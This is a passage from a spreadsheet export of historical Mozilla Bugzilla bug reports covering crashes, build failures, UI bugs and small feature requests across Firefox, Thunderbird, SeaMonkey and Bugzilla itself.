Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050522 Firefox/1.0+
Using extension Spellbound 0.7.3 choosing option Recheck Page causes a crash.
[url=http://talkback-public.mozilla.org/talkback/fastfind.jsp?search=2type=iidid=6055582y]Talkback
FastFind - Incident ID: 6055582 [@ GetScopeOfObject] (FirefoxTrunk - 2005052214
- Windows NT 5.1 build 2600)[/url]
See also forum discussion: 
http://forums.mozillazine.org/viewtopic.php?p=1485681#1485681
At least the nightly of 19 May had no crash.
Reproducible: Always
Steps to Reproduce:
1. Install Spellbound 0.7.3 on the latest trunk build
2. Paste some text in the input box of a forum and choose Check Spelling in the
rightclick menu
3. Then choose Recheck
Actual Results:  
A crash.
Expected Results:  
Recheck spelling.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-312679</t>
  </si>
  <si>
    <t>Bugzilla CVS account request for A. Karl Kornel</t>
  </si>
  <si>
    <t>Hello!
I would like to request a CVS account for commits to Bugzilla only.  The form should be faxed in within 
30 minutes of this bug being filed.</t>
  </si>
  <si>
    <t>CORE-466935</t>
  </si>
  <si>
    <t>TM: non-DEBUG JS_JIT_SPEW doesn't build again</t>
  </si>
  <si>
    <t>It worked for a bit but it's kinda broken now.  Main issues:
1)  Various JS_JIT_SPEW stuff in jstracer.cpp and jsregexp.cpp uses
    FramePCOffset which is ifdef DEBUG.  Can we make it not DEBUG-only or
    somehow condition it on JS_JIT_SPEW?
2)  jsregexp.cpp assumes that it can access LirBuffer::names ifdef JS_JIT_SPEW.
    But that's an LIR thing not controlled by JS_JIT_SPEW at all.  It's
    controlled by the nanojit verbose_only macro.  In theory that's defined
    when NJ_VERBOSE is defined but just defining without defining DEBUG
    doesn't seem to build (more people making assumptions I think).  Can we
    just wrap the LirBuffer::names access in DEBUG or NJ_VERBOSE ifdefs and not
    worry here?
3)  jsregexp uses VerboseWriter which is also conditioned on NJ_VERBOSE.
I'm not sure whether jsregexp wants to just condition the whole thing on DEBUG instead of JS_JIT_SPEW and be done with it.</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-342508</t>
  </si>
  <si>
    <t>make microsummary service use nsIDocShell.loadStream() to load HTML content into hidden iframes</t>
  </si>
  <si>
    <t>The fix for bug 339543 will make the microsummary service use data: URLs to load HTML content into hidden iframes.  data: URLs are suboptimal because among other reasons they get displayed in their entirety in CSS error messages on the console.
The microsummary service should use nsIDocShell.loadStream instead of data: URLs to load HTML content into hidden iframes.  For that we'll need to make loadStream scriptable which should be possible.</t>
  </si>
  <si>
    <t>CORE-438702</t>
  </si>
  <si>
    <t>Canvas text baselines not fully implemented</t>
  </si>
  <si>
    <t>The textBaseline attribute of Canvas is not fully implemented. The ideographic and hanging baselines are currently silently treated as the alphabetic baseline due to lack of font metric support.</t>
  </si>
  <si>
    <t>CORE-181383</t>
  </si>
  <si>
    <t>initialize layout atoms in a loop</t>
  </si>
  <si>
    <t>So this whole scheme we have with nsHTMLAtoms is cool but its slightly bloaty.
The bloaty part is nsHTMLAtoms::AddRefAtoms nsHTMLAtoms::ReleaseAtoms which
seperately call AddRef and Release on each atom - when you add up the total size
of all the ns*Atoms::AddRef/ReleaseAtoms() methods the code itself adds up to
somewhere around 50k... since this is in the shared static lib this means
we're duplicating it so we're talking somewhere just under 100k of total footprint.
We need to come up with some way of initializing this in a loop.. here's my
idea..  we create some dummy first atom and declare the initialization strings
in a data structure like:
static const char* AtomValues[] = {
#define HTML_ATOM(_name _value) _value
#include nsHTMLAtomList.h
#undef HTML_ATOM
}
then we have a loop something like:
nsIAtom** firstAtom = 
firstAtom++ // advance past dummy atom
for (i=0 i&lt;(sizeof(AtomValues)/sizeof(AtomValues[0])) i++) {
  *firstAtom++ = NS_NewAtom(AtomValues[i])
} 
and then we can do something similar with ReleaseAtoms()</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-356166</t>
  </si>
  <si>
    <t>Remove 10.2 runtime checks/fallbacks</t>
  </si>
  <si>
    <t>There's a bunch of 10.2-only runtime stuff that we can remove without having to wait for the switch to the 10.3 SDK.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-812833</t>
  </si>
  <si>
    <t>Use multilocale gecko and gaia for b2g device builds (unagi otoro panda)</t>
  </si>
  <si>
    <t>When we currently create B2G builds we simply use the locales that are present in git:  en-US ar fr zh-TW.
I'd like to change this.
1. Let's build with en-US ar fr zh-TW es pt-BR
2. For all five non en-US locales above let's use the most up-to-date translations from http://hg.mozilla.org/gaia-l10n instead of the files which landed in git.
gaia locales: en-US ar fr zh-TW es pt-BR
gecko locales: all Fennec locales</t>
  </si>
  <si>
    <t>CORE-163257</t>
  </si>
  <si>
    <t>[gtk2] Use gtk_window_set_icon_list()</t>
  </si>
  <si>
    <t>It looks like we should use gtk_window_set_icon_list() to make both the large
(32px) and small (16px) icon sizes available to the window manager for gtk2.</t>
  </si>
  <si>
    <t>TOOLKIT-454730</t>
  </si>
  <si>
    <t>Move shutdown of GTK's fontmap from gfxPlatformGtk to nsAppRunner</t>
  </si>
  <si>
    <t>GTK's fontmap should not be shutdown until after we have finished with GTK.
Thebes will use a different fontmap after bug 385263.</t>
  </si>
  <si>
    <t>BUGZILLA-524915</t>
  </si>
  <si>
    <t>Quoted comments can overflow the comment box</t>
  </si>
  <si>
    <t>Look at bug 524809 comment 1: Long lines totally break the layout.
This is a one-liner to fix. Just add
overflow-x:auto
to the .bz_comment CSS class in the bugzilla standard themes. The box will get a horizontal scroll bar if too wide. If you could apply this to Mozilla's bz instance too that'd be terrific.</t>
  </si>
  <si>
    <t>arnold</t>
  </si>
  <si>
    <t>SEAMONKEY-212469</t>
  </si>
  <si>
    <t>Spell checker checks quoted text for HTML mail. [1.4.1]</t>
  </si>
  <si>
    <t>I've been trying to fix this issue for thunderbird for a while. Much to my
suprise I discovered that at one time this feature actually worked (Bug
#173046) and was checked in back in December of 2002. 
Unfortunately it hasn't been working for quite some time. There is a problem
with the way the compose txt filter service gets registered in
nsComposerRegistration which causes us to always create the NON-mail one which
won't ignore quoted text.
one line fix coming up.</t>
  </si>
  <si>
    <t>FIREFOX-483375</t>
  </si>
  <si>
    <t>The Location text box in the Open Location dialog box should always be LTR</t>
  </si>
  <si>
    <t>Created attachment 367367
Patch (v1)
The location text box in the Open Location dialog box should be LTR even for RTL locales because the URL is inherently LTR.</t>
  </si>
  <si>
    <t>CORE-170615</t>
  </si>
  <si>
    <t>eliminate use of nsAutoString in parser attribute token</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.0.1) Gecko/20020823 Netscape/7.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.0.1) Gecko/20020823 Netscape/7.0
to reduce the size of attribute token for footprint improvement.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>THUNDERBIRD-500844</t>
  </si>
  <si>
    <t>search tabs should use search icons</t>
  </si>
  <si>
    <t>Created attachment 385512
sets the search icon for each search tab
The attached patch sets the search icon for each search tab to use the same Search-glass.png icon that the search entry uses.
I made the patch for each of the three themes however I've only tested this in Vista.</t>
  </si>
  <si>
    <t>CORE-523356</t>
  </si>
  <si>
    <t>Remote event listeners for Electrolysis</t>
  </si>
  <si>
    <t>As a first step event.target and similar won't be possible.</t>
  </si>
  <si>
    <t>CORE-742560</t>
  </si>
  <si>
    <t>Increase Fennec's disk cache size</t>
  </si>
  <si>
    <t>We currently use a smaller disk cache than other browsers and I suspect that may be hurting us.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-486782</t>
  </si>
  <si>
    <t>New variable: MOZ_FS_LAYOUT should be used instead of OS or Toolkit to determine file system layout</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X 10_5_6 en-us) AppleWebKit/530.5+ (KHTML like Gecko) Version/3.2.1 Safari/525.27.1
Build Identifier: 
Darwin/gtk uses the traditional UNIX layout but there are places in the build that assume Darwin = bundle.  The cleanest solution is to create a single new variable to describe this that has options for:
traditional : The traditional unix layout (placing the startup script in bin libs etc in mozilla_five_home etc)
bundle : Create a NextStep / Darwin / OSX style bundle (ie: Firefox.app)
winnt : windows stuff (I have no real understanding of how that works but I assume we'd replace most of the OS=WINNT with this check)
Reproducible: Always</t>
  </si>
  <si>
    <t>FIREFOX-331755</t>
  </si>
  <si>
    <t>Use Bookmark option for setting the home page is broken</t>
  </si>
  <si>
    <t>chrome://browser/content/bookmarks/selectBookmark.xul isn't packaged anymore. It needs to be rewritten to work with Places.</t>
  </si>
  <si>
    <t>CORE-387499</t>
  </si>
  <si>
    <t>keys (Up/Down/any character) no longer working in collapsed XUL combo boxes</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Navigate to a combo box such as the When Minefield Starts: combo box in Minefield's Preference's dialog or the Style: combo box on the Display pane for Thunderbird's Preferences dialog.
2. With the combo box collapsed use Up/Down Arrow to move among the choices.
Expected results:  Up/Down Arrow would allow you to navigate among items in the combo box.
Actual results: Up/Down Arrow do nothing.
This seems to have been introduced in the 5th July builds.</t>
  </si>
  <si>
    <t>DEVTOOLS-712113</t>
  </si>
  <si>
    <t>Inspector</t>
  </si>
  <si>
    <t>Either brace should be clickable to add new properties in the Style panel's Rule View</t>
  </si>
  <si>
    <t>It seems like one can only add properties by clicking on the line of the lower brace. It'd be a lot easier to be able to click on either one. Really it would be great to be able to click on any whitespace in the style editor to add a style.
http://cl.ly/0N290t1C263g0w0p3b1D</t>
  </si>
  <si>
    <t>maxheadwound+bugs</t>
  </si>
  <si>
    <t>MINIMO_GRAVEYARD-333021</t>
  </si>
  <si>
    <t>Fullscreen mode issue</t>
  </si>
  <si>
    <t>see 333020 for homebase bar issues...
There is some extra stuff at the bottom of the screen when you go into fullscreen mode:
http://www.drque.net/public/2006_21_02_PDA_Screenshot.png</t>
  </si>
  <si>
    <t>CORE-326981</t>
  </si>
  <si>
    <t>[BeOS] Fix to bug 325229 seems to have broken BeOS builds</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (BeOS U BeOS BePC en-US rv:1.9a1) Gecko/20060206 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (BeOS U BeOS BePC en-US rv:1.9a1) Gecko/20060206 Firefox/1.6a1
BeOS builds break in mozilla/xpcom/base/nsDebugImpl.cpp though it cleanly compiled on 2006-02-04.
Reproducible: Always
Steps to Reproduce:
1.build firefox
2.
3.
Actual Results:  
build breaks in mozilla/xpcom/base/nsDebugImpl.cpp
Expected Results:  
clean build</t>
  </si>
  <si>
    <t>BUGZILLA-215320</t>
  </si>
  <si>
    <t>Change several bugs at once causes extraneous messages in apache log file</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686) Gecko/20030428 Galeon/1.3.3
Build Identifier: Mozilla/5.0 (X11 U Linux i686) Gecko/20030428 Galeon/1.3.3
When changing several bugs at once eg adding a comment there are messages
generated like the following:
 process_bug.cgi: Use of uninitialized value in pattern match (m//) at
globals.pl line 831.
 Use of uninitialized value in string eq at
/var/www/html/bugzilla-cvs/process_bug.cgi line 368
It appears that on line 1119 in process_bug.cgi that $::FORM{'component_id'} is
being set to get_component_id(...) even if $FORM{'component'} equals dontchange.
 This can cause it to be undef.  When the loop following this assignment calls
CheckCanChangeField then we get the message from line 368 given above.  The
first message about line 831 in globals.pl is because the product is also set to
dontchange.
Reproducible: Always
Steps to Reproduce:
1.query a list of bugs
2.goto to change several bugs at once page
3.add a comment to 1 or more bugs
Actual Results:  
messages in apache's error_log file such as
process_bug.cgi: Use of uninitialized value in pattern match (m//) at globals.pl
line 831.
Expected Results:  
no messages generated to error_log file</t>
  </si>
  <si>
    <t>CORE-225910</t>
  </si>
  <si>
    <t>Remove hand-parsing for refs in content sinks and docshell</t>
  </si>
  <si>
    <t>The content sinks and docshell do this hand-parsing of refs... Now that nsJARURI
implements nsIURL I do not think that's necessary any longer.  I propose to
remove that code.
Refs:
http://lxr.mozilla.org/seamonkey/source/content/html/document/src/nsHTMLContentSink.cpp#3811
http://lxr.mozilla.org/seamonkey/source/content/xml/document/src/nsXMLContentSink.cpp#883
http://lxr.mozilla.org/seamonkey/source/docshell/base/nsDocShell.cpp#5702
I think I can use getRelativeSpec to simplify the docshell code (if the relative
spec of aURI relative to mCurrentURI starts with a '#' then it just differs by
an anchor).
Thoughts?</t>
  </si>
  <si>
    <t>dd.mozilla</t>
  </si>
  <si>
    <t>SEAMONKEY-478768</t>
  </si>
  <si>
    <t>aWindow.getBrowser is not a function when calling nsSessionStore:getWindowState()</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b3pre) Gecko/20090216 SeaMonkey/2.0a3pre
The problem is with line 1482 in nsSessionStore.js:
total._closedTabs = this._getClosedTabs(this._windows[aWindow.__SSi])
See bug 478470 comment #13.
This shouldn't work as this._windows is a collection of window data not
DOMWindows. Unfortunately we don't seem to have a test for detecting this so
far...
Reproducible: Always
Steps to Reproduce:
1. Enter the following in the error console:
var win = Components.classes[@mozilla.org/appshell/window-mediator1].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow(navigator:browser) Components.classes[@mozilla.org/suite/sessionstore1].getService(Components.interfaces.nsISessionStore).getWindowState(win)
Actual Results:  
Error: uncaught exception: [Exception... '[JavaScript Error: aWindow.getBrowser is not a function {file: file:///C:/Program%20Files/SeaMonkey/components/nsSessionStore.js line: 2457}]' when calling method: [nsISessionStore::getWindowState]  nsresult: 0x80570021 (NS_ERROR_XPC_JAVASCRIPT_ERROR_WITH_DETAILS)  location: JS frame :: javascript:%20var%20win%20=%20Components.classes[@mozilla.org/appshell/window-mediator1].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow(navigator:browser)%20Components.classes[@mozilla.org/suite/sessionstore1].getService(Components.interfaces.nsISessionStore).getWindowState(win) ::  :: line 1  data: yes]
Expected Results:  
Should display the window state as a JSON.  Similar to what Firefox does when the same command is used.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG_GRAVEYARD-418417</t>
  </si>
  <si>
    <t>Thunderbird is not a browser</t>
  </si>
  <si>
    <t>Bottom of the contact page:
Inquiries
Browser distribution and licensing</t>
  </si>
  <si>
    <t>CORE-504233</t>
  </si>
  <si>
    <t>Add SIZE_MAX etc. #defines to jsinttypes.h</t>
  </si>
  <si>
    <t>For greater styling as though we were using C99's definitions directly...</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-285054</t>
  </si>
  <si>
    <t>ConvertDDBtoDIB violates windows APIs</t>
  </si>
  <si>
    <t>quoting
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/gdi/bitmaps_7gms.asp
hbmp
    [in] Handle to the bitmap. This must be a compatible bitmap (DDB).
The bitmap identified by the hbmp parameter must not be selected into a device
context when the application calls this function.
This function does select the bitmap into a DC:
1661       oldbits = (HBITMAP)::SelectObject(memPrDCmHBitmap)
Also in many cases mHBitmap seems to be a DIB as created by CreateDIBSection:
http://lxr.mozilla.org/seamonkey/source/gfx/src/windows/nsImageWin.cpp#1498</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-329522</t>
  </si>
  <si>
    <t>Use JNI's RegisterNatives in javaxpcomglue</t>
  </si>
  <si>
    <t>JNI provides a RegisterNatives method which associates a given Java native method with a method implementation.  This is in contrast to explicitly exporting the method impls from the JNI library and then loading the library into Java.
Using RegisterNatives would make it easier to add Java native methods in the future since we wouldn't need to worry about creating an exported dummy method in javaxpcomglue.  Also it would remove the javaxpcomglue library as the go between when Java methods call into XPCOM and back.  That is all calls into XPCOM from Java currently look like this:
  Java --&gt; javaxpcomlgue  \
                           &gt; JavaXPCOM (as part of libXUL)
  Java &lt;-- javaxpcomglue  /
Using RegisterNatives we can directly associate the Java methods with their implementations in the XUL library.</t>
  </si>
  <si>
    <t>CORE-702508</t>
  </si>
  <si>
    <t>Support parsing/computing multi-line flexbox properties flex-wrap align-content</t>
  </si>
  <si>
    <t>CSS3 Flexbox includes both a single-line and a multi-line mode.[1]
I'm intending to leave out the multi-line mode from our initial flexbox implementation as noted in bug 696253 comment 11 and to add multi-line support in a followup bug.
This is that followup bug.
[1] http://dev.w3.org/csswg/css3-flexbox/#multiline</t>
  </si>
  <si>
    <t>BUGZILLA-328438</t>
  </si>
  <si>
    <t>Eliminate @::log_columns</t>
  </si>
  <si>
    <t>Right now the @::log_columns global variable is used for a lot of purposes in a few files. Basically it lists what the important fields of the bugs table are.
Basically as far as I can tell it's called log_columns because it lists which columns should be logged into the activity table or which ones should be mentioned in email.
It really seems like we should just have some boolean field in the fielddefs table to accomplish this but I'm not sure what it would be called.
Perhaps for now we'll just make a subroutine in Bugzilla::Bug called editable_bug_fields().</t>
  </si>
  <si>
    <t>CORE-237078</t>
  </si>
  <si>
    <t>Remove table background quirk</t>
  </si>
  <si>
    <t>Just to reword the summary
  Remove quirky table background painting for 1.8a and back out the change in a
  later release if it causes problems.</t>
  </si>
  <si>
    <t>BUGZILLA-303683</t>
  </si>
  <si>
    <t>[PatchReader] Filenames on patch diffs are corrupted when using PatchReader &gt; v0.9.2</t>
  </si>
  <si>
    <t>This problem can for example be seen at
https://bugzilla.mozilla.org/attachment.cgi?id=184686&amp;action=diff notice how
second subdirectory is always incorrectly prefixed with mai.
I tracked this down to be a regression caused by a fix in PatchReader v0.9.3.
Here's the relevant IRC log regarding this problem:
[2005-07-07 15:11:26]  LpSolit: diff problems are due to DOS line
endings in files
[2005-07-07 15:12:12]  this explains why wurblzap' patch is affected.
He uses Windows
[2005-07-07 15:12:39]  PatchReader/FixPatchRoot.pm failes to remove
trailing v because of that (line 81)
[2005-07-07 15:13:15]  Zornreich: is it a regression?
[2005-07-07 15:13:17]  and so next line failes to remove exactly
three chars from filename
[2005-07-07 15:13:36]  I never saw this problem before
[2005-07-07 15:13:57]  that file hasn't changed between 0.9.2 and
0.9.5 of PatchReader
[2005-07-07 15:14:04]  strange
[2005-07-07 15:14:28]  hmm.. but regexps extracting the RCS filename
might have. hang on.
[2005-07-07 15:15:20]  it was changed from /^RCS file: (\S+)/ to
/^RCS file: (.+)/
[2005-07-07 15:15:34]  and $1 would be taken to be RCS filename
[2005-07-07 15:15:56]  that's a bogus change
[2005-07-07 15:18:28]  if I change it back the bug goes away
[2005-07-07 15:18:42]  so it really is a regression in PatchReader
module
[2005-07-07 15:19:12]  actually in PatchReader/Raw.pm module
[2005-07-07 15:20:32]  that change was introduced in v0.9.3 of
PatchReader.
[2005-07-07 15:20:53]  Changes state for that version Fix problem
with patches with spaces in them
[2005-07-07 15:21:16]  justdave: so downgrade to PatchReader 0.9.2
to fix this :)
...
[2005-07-07 15:23:06]  Zornreich: wait. I have 0.9.5 but I don't see
this problem
[2005-07-07 15:23:54]  LpSolit: you need to be using
PatchReader/FixPatchRoot.pm and to use that you need to have cvsroot param
defined in Bugzilla
...
[2005-08-06 17:24:46]  Zornreich: you are right the problem is still
present with 0.9.5</t>
  </si>
  <si>
    <t>CORE-486556</t>
  </si>
  <si>
    <t>random orange in test_delay_load.html</t>
  </si>
  <si>
    <t>On mozilla-central we had a random orange on Linux mozilla-central unit test at 07:18 on 2009-04-02:
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox/1238681884.1238687267.14373.gz
*** 27850 ERROR TEST-UNEXPECTED-FAIL | /tests/content/media/video/test/test_delay_load.html | onload was not delayed until after metadataloaded - got 4 expected 5</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-407532</t>
  </si>
  <si>
    <t>First community survey's results - a database dump</t>
  </si>
  <si>
    <t>I'm the person responsible for the Community Surveys project . I would like to analyze the first survey's results but due to some technical issues (I've only finished the retrieving code recently plus there is the data protection issue covered in bug 407461) I don't have the access to the answers stored in the database and I expect it will take some time before I do.
However since all the code is ready I would be able to analyze the results locally during the next days if I only had a copy of the database's contents.
Would it be possible to provide me (not as an attachment to this bug but rather through a secure ftp or direct e-mail) with a dump of the 'answers' table from the database used with the surveys.mozilla-europe.org site?</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-209428</t>
  </si>
  <si>
    <t>http://www.msz.gov.pl/ - left hand menu does not work [document.layers and friends]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 PL rv:1.4b) Gecko/20030516 Mozilla Firebird/0.6
Build Identifier: Mozilla/5.0 (Windows U Win98 PL rv:1.4b) Gecko/20030516 Mozilla Firebird/0.6
Ministry of Foreign Affairs uses non standard code on their webpage:
http://www.msz.gov.pl/ [document.layers/document.all] preventing real browsers
from displaying the content properly. 
Code contained in:
http://www.msz.gov.pl/js/layers.js
http://www.msz.gov.pl/js/preload.js
Stylesheet is also not loaded properly so fonts and layout (top of the page and
others) are messed up. 
http://www.msz.gov.pl/js/css.js
  I've sent a note but without going into much of details so feel free to
contact them again ) Email addresses used:
dsi@msz.gov.pl  (MSZ contact)
serwis@akonet.pl (webmaster)
Reproducible: Always
Steps to Reproduce:
1. Go to http://www.msz.gov.pl/js/layers.js to see why MSZ is not usuable under
any standard compliant browser.
2.
3.</t>
  </si>
  <si>
    <t>pbartecki</t>
  </si>
  <si>
    <t>FIREFOX-351896</t>
  </si>
  <si>
    <t>Prepare win32 installer for the RC's</t>
  </si>
  <si>
    <t>As long as we don't have --enable-official-branding we can make the win32 installer changes for the RC's now. Patch coming up</t>
  </si>
  <si>
    <t>CORE-303404</t>
  </si>
  <si>
    <t>Crash in menus but only in debug builds</t>
  </si>
  <si>
    <t>This crash does not happen in release builds on either Windows or Linux.
1) Click on a toolbar bookmark folder 
2) right click on an entry
3) press escape
*crash*
It crashes because the menulistener caller to Escape gets destroyed. Then there
is nothing to return to. Perhaps we need a kungFuDeathGrip?
This is the stack that shows the nsMenuListener both calling and getting
destroyed before we can return to it.
 	gklayout.dll!nsMenuListener::~nsMenuListener()  Line 86	C++
 	gklayout.dll!nsMenuListener::`scalar deleting destructor'()  + 0xf	C++
 	gklayout.dll!nsMenuListener::Release()  Line 72 + 0x97	C++
 	gklayout.dll!nsMenuPopupFrame::RemoveKeyboardNavigator()  Line 1917 + 0x1b	C++
&gt;	gklayout.dll!nsPopupSetFrame::OpenPopup(nsPopupFrameList * aEntry=0x03a31b88
int aActivateFlag=0x00000000)  Line 529	C++
 	gklayout.dll!nsPopupSetFrame::DestroyPopup(nsIFrame * aPopup=0x039073dc int
aDestroyEntireChain=0x00000000)  Line 442	C++
 	gklayout.dll!nsMenuPopupFrame::Escape(int &amp; aHandledFlag=0x00000000)  Line
1422	C++
 	gklayout.dll!nsMenuListener::KeyPress(nsIDOMEvent * aKeyEvent=0x03a4e7d0) 
Line 190	C++</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-428195</t>
  </si>
  <si>
    <t>[pa-IN] Getting started page for Firefox 3 potential link changes</t>
  </si>
  <si>
    <t>CALENDAR-470394</t>
  </si>
  <si>
    <t>Guard all SQL transactions in case of database corruption</t>
  </si>
  <si>
    <t>Created attachment 353794
Fix - v1
I've recently had someone with an obviously corrupted database. All his events were not showing due to the fact that getting additional data threw an exception. We were able to restore his data by catching the exception and resetting the statement.
This patch takes care of that for all remaining SQL transactions in the storage provider.</t>
  </si>
  <si>
    <t>SEAMONKEY-412821</t>
  </si>
  <si>
    <t>Adding Russian locale to all-locales for venkman</t>
  </si>
  <si>
    <t>Please add Russian locale for venkman.
Thanks.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-263088</t>
  </si>
  <si>
    <t>[404] link to http://www.mozilla.org/products/firefox/contact.html</t>
  </si>
  <si>
    <t>Broken link on the new Firefox Help page</t>
  </si>
  <si>
    <t>CORE-322185</t>
  </si>
  <si>
    <t xml:space="preserve">Crash [@ nsBox::DoesNeedRecalc] with </t>
  </si>
  <si>
    <t>Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a1) Gecko/20060102 Firefox/1.6a1
To crash just load the testcase.
Stack trace:
nsBox::DoesNeedRecalc(nsSize const&amp;) + 0
nsFrame::GetPrefSize(nsBoxLayoutState&amp; nsSize&amp;) + 48
nsSprocketLayout::GetPrefSize(nsIFrame* nsBoxLayoutState&amp; nsSize&amp;) + 268
nsGridRowLeafLayout::GetPrefSize(nsIFrame* nsBoxLayoutState&amp; nsSize&amp;) + 116
nsBoxFrame::GetPrefSize(nsBoxLayoutState&amp; nsSize&amp;) + 200
nsXULScrollFrame::GetPrefSize(nsBoxLayoutState&amp; nsSize&amp;) + 240
nsBoxFrame::Reflow(nsPresContext* nsHTMLReflowMetrics&amp; nsHTMLReflowState const&amp; unsigned&amp;) + 204
nsXULScrollFrame::Reflow(nsPresContext* nsHTMLReflowMetrics&amp; nsHTMLReflowState const&amp; unsigned&amp;) + 56
nsSVGOuterSVGFrame::Reflow(nsPresContext* nsHTMLReflowMetrics&amp; nsHTMLReflowState const&amp; unsigned&amp;) + 256
nsContainerFrame::ReflowChild(nsIFrame* nsPresContext* nsHTMLReflowMetrics&amp; nsHTMLReflowState const&amp; int int unsigned unsigned&amp;) + 148
CanvasFrame::Reflow(nsPresContext* nsHTMLReflowMetrics&amp; nsHTMLReflowState const&amp; unsigned&amp;) + 356
nsContainerFrame::ReflowChild(nsIFrame* nsPresContext* nsHTMLReflowMetrics&amp; nsHTMLReflowState const&amp; int int unsigned unsigned&amp;) + 148
nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState const&amp; int int nsHTMLReflowMetrics* int) + 500
nsHTMLScrollFrame::ReflowContents(ScrollReflowState* nsHTMLReflowMetrics const&amp;) + 160
nsHTMLScrollFrame::Reflow(nsPresContext* nsHTMLReflowMetrics&amp; nsHTMLReflowState const&amp; unsigned&amp;) + 848
nsContainerFrame::ReflowChild(nsIFrame* nsPresContext* nsHTMLReflowMetrics&amp; nsHTMLReflowState const&amp; int int unsigned unsigned&amp;) + 148
ViewportFrame::Reflow(nsPresContext* nsHTMLReflowMetrics&amp; nsHTMLReflowState const&amp; unsigned&amp;) + 300
IncrementalReflow::Dispatch(nsPresContext* nsHTMLReflowMetrics&amp; nsSize const&amp; nsIRenderingContext&amp;) + 280
PresShell::ProcessReflowCommands(int) + 524
PresShell::WillPaint() + 88
nsViewManager::FlushPendingInvalidates() + 164
nsViewManager::EnableRefresh(unsigned) + 156
nsViewManager::EndUpdateViewBatch(unsigned) + 132
PresShell::InitialReflow(int int) + 748
nsContentSink::StartLayout(int) + 208
nsXMLContentSink::StartLayout() + 144
nsXMLContentSink::DidBuildModel() + 456
nsExpatDriver::DidBuildModel(unsigned int nsIParser* nsIContentSink*) + 56
nsParser::DidBuildModel(unsigned) + 120
nsParser::ResumeParse(int int int) + 592
nsParser::OnStopRequest(nsIRequest* nsISupports* unsigned) + 192
nsDocumentOpenInfo::OnStopRequest(nsIRequest* nsISupports* unsigned) + 124
nsBaseChannel::OnStopRequest(nsIRequest* nsISupports* unsigned) + 92
nsInputStreamPump::OnStateStop() + 160
nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) + 128
nsAStreamCopier::PostContinuationEvent_Locked() + 1240
PL_HandleEvent + 36
PL_ProcessPendingEvents + 128
...</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-166932</t>
  </si>
  <si>
    <t>Optimize view opacity</t>
  </si>
  <si>
    <t>Why aren't the following views opaque in Chimera?
CHBrowserView
BrowserWrapper
Also is there a way we can tell if ChildViews can be opaque?
Simply making the CHBrowserView and BrowserWarpper opaque cause lots of
scrolling/typing issues but I'd like to understand why.</t>
  </si>
  <si>
    <t>CORE-43001</t>
  </si>
  <si>
    <t>maximized window sized with javascript should unmaximize</t>
  </si>
  <si>
    <t>Reproduction:
1) Maximize the window.
2) Execute the URL.
Actual:
Maximized window is resized (and area is not repainted as mentioned in 42999).
Expected:
Maximized window is de-maximized and then resized or some other reasonable 
solution.</t>
  </si>
  <si>
    <t>CALENDAR-274793</t>
  </si>
  <si>
    <t>leaking JS atoms and GC roots</t>
  </si>
  <si>
    <t>I get these errors when trying to parse a ics file into events and put those
events in a memory calendar:
JS engine warning: 2 atoms remain after destroying the JSRuntime.
                   These atoms may point to freed memory. Things reachable
                   through them have not been finalized.
JS engine warning: leaking GC root 'XPCVariant::mJSVal' at 0x8147e4c
JS engine warning: 1 GC root remains after destroying the JSRuntime.
                   This root may point to freed memory. Objects reachable
                   through it have not been finalized.
i see the first error all the time but the seconds seems to be more interesting</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-246846</t>
  </si>
  <si>
    <t>Add new release Paste and Go 0.4.1 Set 0.4 as Moz-compatible</t>
  </si>
  <si>
    <t>The Paste and Go extension was made by me it's not part of the Optimoz Project.
Please create a separate account for me on update.mozilla.org and link Paste
and Go to it.</t>
  </si>
  <si>
    <t>CORE-505738</t>
  </si>
  <si>
    <t>nsScriptableRegion::GetRects doesn't handle failure from JS_NewArrayObject [@ JS_DefineElement - nsScriptableRegion::GetRects]</t>
  </si>
  <si>
    <t>188   JSObject *destArray = JS_NewArrayObject(cx mRectSet-&gt;mNumRects*4 NULL)
JS_NewArrayObject will return null on oom
and you'll crash here:
196     JS_DefineElement(cx destArray n INT_TO_JSVAL(rect.x) NULL NULL JSPROP_ENUMERATE)</t>
  </si>
  <si>
    <t>SOCORRO-525963</t>
  </si>
  <si>
    <t>Add ability to gather all comments for a given crash signature</t>
  </si>
  <si>
    <t>Often comments contain valueable information and we should provide a way to retrieve all comments (going back to the end of time) for a given crash signature.
